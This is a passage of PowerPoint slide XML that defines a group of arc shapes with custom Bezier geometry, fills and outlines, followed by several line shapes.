                    <a:pt x="395" y="25717"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="24360"/>
                    <a:pt x="0" y="22981"/>
                    <a:pt x="0" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9670"/>
                    <a:pt x="9670" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25616" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67014" name="Arc 1478">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C537924-0F34-C149-B735-CFE8CC2759A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1553" y="3120"/>
              <a:ext cx="773" cy="345"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 384 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32097 w 32097"/>
                <a:gd name="T1" fmla="*/ 19262 h 21984"/>
                <a:gd name="T2" fmla="*/ 3 w 32097"/>
                <a:gd name="T3" fmla="*/ 0 h 21984"/>
                <a:gd name="T4" fmla="*/ 21600 w 32097"/>
                <a:gd name="T5" fmla="*/ 384 h 21984"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32097" h="21984" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="255"/>
                    <a:pt x="1" y="127"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32097" h="21984" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32096" y="19261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28886" y="21047"/>
                    <a:pt x="25273" y="21984"/>
                    <a:pt x="21600" y="21984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21984"/>
                    <a:pt x="0" y="12313"/>
                    <a:pt x="0" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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5" name="Arc 1479">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6733A9A-AB47-9D44-933F-7AF0C19C3546}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1560" y="3120"/>
              <a:ext cx="761" cy="337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 386 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 32039 w 32039"/>
                <a:gd name="T1" fmla="*/ 19296 h 21986"/>
                <a:gd name="T2" fmla="*/ 3 w 32039"/>
                <a:gd name="T3" fmla="*/ 0 h 21986"/>
                <a:gd name="T4" fmla="*/ 21600 w 32039"/>
                <a:gd name="T5" fmla="*/ 386 h 21986"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="32039" h="21986" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="32039" h="21986" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="32038" y="19295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28842" y="21060"/>
                    <a:pt x="25251" y="21986"/>
                    <a:pt x="21600" y="21986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9670" y="21986"/>
                    <a:pt x="0" y="12315"/>
                    <a:pt x="0" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="257"/>
                    <a:pt x="1" y="128"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="386"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B6C7C9"/>
            </a:solidFill>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="6C8F93"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67016" name="Arc 1480">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43454431-E3BC-8242-A3F5-5320578EBEA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3626" y="2103"/>
              <a:ext cx="584" cy="427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4470 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26070"/>
                <a:gd name="T1" fmla="*/ 468 h 31631"/>
                <a:gd name="T2" fmla="*/ 23599 w 26070"/>
                <a:gd name="T3" fmla="*/ 31631 h 31631"/>
                <a:gd name="T4" fmla="*/ 4470 w 26070"/>
                <a:gd name="T5" fmla="*/ 21600 h 31631"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26070" h="31631" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="156"/>
                    <a:pt x="2967" y="0"/>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0"/>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7" name="Arc 1481">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A47C9B-0559-D84C-8324-12ECDBE0870A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3628" y="2110"/>
              <a:ext cx="574" cy="418"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 4429 0 0"/>
                <a:gd name="G1" fmla="+- 21600 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 0 w 26029"/>
                <a:gd name="T1" fmla="*/ 459 h 31708"/>
                <a:gd name="T2" fmla="*/ 23518 w 26029"/>
                <a:gd name="T3" fmla="*/ 31708 h 31708"/>
                <a:gd name="T4" fmla="*/ 4429 w 26029"/>
                <a:gd name="T5" fmla="*/ 21600 h 31708"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26029" h="31708" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="-1" y="458"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1456" y="153"/>
                    <a:pt x="2940" y="0"/>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0"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67018" name="Arc 1482">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAF9AF58-2163-2E41-BC8F-9589B551D15E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2534"/>
              <a:ext cx="556" cy="428"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16794 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13584 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29154"/>
                <a:gd name="T2" fmla="*/ 17714 w 21600"/>
                <a:gd name="T3" fmla="*/ 29154 h 29154"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16794 h 29154"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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9" name="Arc 1483">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947171E3-AA3B-724E-89CD-221137172CC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3791" y="2538"/>
              <a:ext cx="549" cy="420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 0 0 0"/>
                <a:gd name="G1" fmla="+- 16858 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 13505 w 21600"/>
                <a:gd name="T1" fmla="*/ 0 h 29298"/>
                <a:gd name="T2" fmla="*/ 17658 w 21600"/>
                <a:gd name="T3" fmla="*/ 29298 h 29298"/>
                <a:gd name="T4" fmla="*/ 0 w 21600"/>
                <a:gd name="T5" fmla="*/ 16858 h 29298"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67020" name="Arc 1484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5177035-417D-6B46-A9AA-A0AB85B3EB57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3609" y="2973"/>
              <a:ext cx="651" cy="607"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7055 0 0"/>
                <a:gd name="G1" fmla="+- 5557 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27928 w 28655"/>
                <a:gd name="T1" fmla="*/ 0 h 27157"/>
                <a:gd name="T2" fmla="*/ 0 w 28655"/>
                <a:gd name="T3" fmla="*/ 25972 h 27157"/>
                <a:gd name="T4" fmla="*/ 7055 w 28655"/>
                <a:gd name="T5" fmla="*/ 5557 h 27157"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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21" name="Arc 1485">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743ECBF8-2B26-804F-9BAF-BFBBD4870784}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3611" y="2975"/>
              <a:ext cx="642" cy="598"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 7053 0 0"/>
                <a:gd name="G1" fmla="+- 5558 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 27926 w 28653"/>
                <a:gd name="T1" fmla="*/ 0 h 27158"/>
                <a:gd name="T2" fmla="*/ 0 w 28653"/>
                <a:gd name="T3" fmla="*/ 25974 h 27158"/>
                <a:gd name="T4" fmla="*/ 7053 w 28653"/>
                <a:gd name="T5" fmla="*/ 5558 h 27158"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67022" name="Arc 1486">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E5EF24-FFAC-594C-9C0E-2E82DC601624}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1358" y="2529"/>
              <a:ext cx="354" cy="592"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12845 w 21600"/>
                <a:gd name="T1" fmla="*/ 41297 h 41297"/>
                <a:gd name="T2" fmla="*/ 20141 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41297"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41297"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41297" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10187"/>
                    <a:pt x="8803" y="767"/>
                    <a:pt x="20141" y="0"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41297" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12844" y="41297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5035" y="37834"/>
                    <a:pt x="0" y="30094"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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23" name="Arc 1487">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C157F0A-E4EB-0749-A05A-3E25A9F052CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1365" y="2536"/>
              <a:ext cx="347" cy="578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21600 0 0"/>
                <a:gd name="G1" fmla="+- 21551 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 12867 w 21600"/>
                <a:gd name="T1" fmla="*/ 41307 h 41307"/>
                <a:gd name="T2" fmla="*/ 20146 w 21600"/>
                <a:gd name="T3" fmla="*/ 0 h 41307"/>
                <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                <a:gd name="T5" fmla="*/ 21551 h 41307"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="41307" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10186"/>
                    <a:pt x="8806" y="765"/>
                    <a:pt x="20145" y="-1"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="21600" h="41307" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="12867" y="41306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5045" y="37849"/>
                    <a:pt x="0" y="30102"/>
                    <a:pt x="0" y="21551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0"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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67024" name="Arc 1488">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DD0D8A-F188-F347-8BD1-C44FCA993B86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2293" y="3335"/>
              <a:ext cx="1344" cy="361"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21277 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39224 w 39224"/>
                <a:gd name="T1" fmla="*/ 12019 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39224"/>
                <a:gd name="T3" fmla="*/ 3720 h 21600"/>
                <a:gd name="T4" fmla="*/ 21277 w 39224"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39224" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>
                    <a:pt x="21277" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10782" y="21600"/>
                    <a:pt x="1807" y="14057"/>
                    <a:pt x="-1" y="3720"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39224" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39224" y="12019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35214" y="18006"/>
                    <a:pt x="28483" y="21600"/>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25" name="Arc 1489">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC54CC0-64A9-A94A-99BA-84B5ED58ACD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2300" y="3335"/>
              <a:ext cx="1329" cy="354"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="G0" fmla="+- 21271 0 0"/>
                <a:gd name="G1" fmla="+- 0 0 0"/>
                <a:gd name="G2" fmla="+- 21600 0 0"/>
                <a:gd name="T0" fmla="*/ 39161 w 39161"/>
                <a:gd name="T1" fmla="*/ 12103 h 21600"/>
                <a:gd name="T2" fmla="*/ 0 w 39161"/>
                <a:gd name="T3" fmla="*/ 3756 h 21600"/>
                <a:gd name="T4" fmla="*/ 21271 w 39161"/>
                <a:gd name="T5" fmla="*/ 0 h 21600"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="39161" h="21600" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>
                    <a:pt x="21271" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10790" y="21600"/>
                    <a:pt x="1822" y="14076"/>
                    <a:pt x="0" y="3755"/>
                  </a:cubicBezTo>
                </a:path>
                <a:path w="39161" h="21600" stroke="0" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39161" y="12103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35143" y="18042"/>
                    <a:pt x="28441" y="21600"/>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sz="1797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67026" name="Line 1490">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8997003F-CD6C-5F46-AFB4-1FC5016DE1A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8029171" y="2380018"/>
            <a:ext cx="606889" cy="22183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27" name="Line 1491">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836674C8-CAF8-6349-973D-B62311B99922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7983219" y="2655733"/>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28" name="Line 1492">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A214C063-89CA-344F-A186-4FA23A362EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8683597" y="2380018"/>
            <a:ext cx="419909" cy="77168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29" name="Line 1493">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7944FC-CA78-4247-976E-15D72774742A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8403128" y="3042366"/>
            <a:ext cx="700378" cy="109336"/>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30" name="Line 1494">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
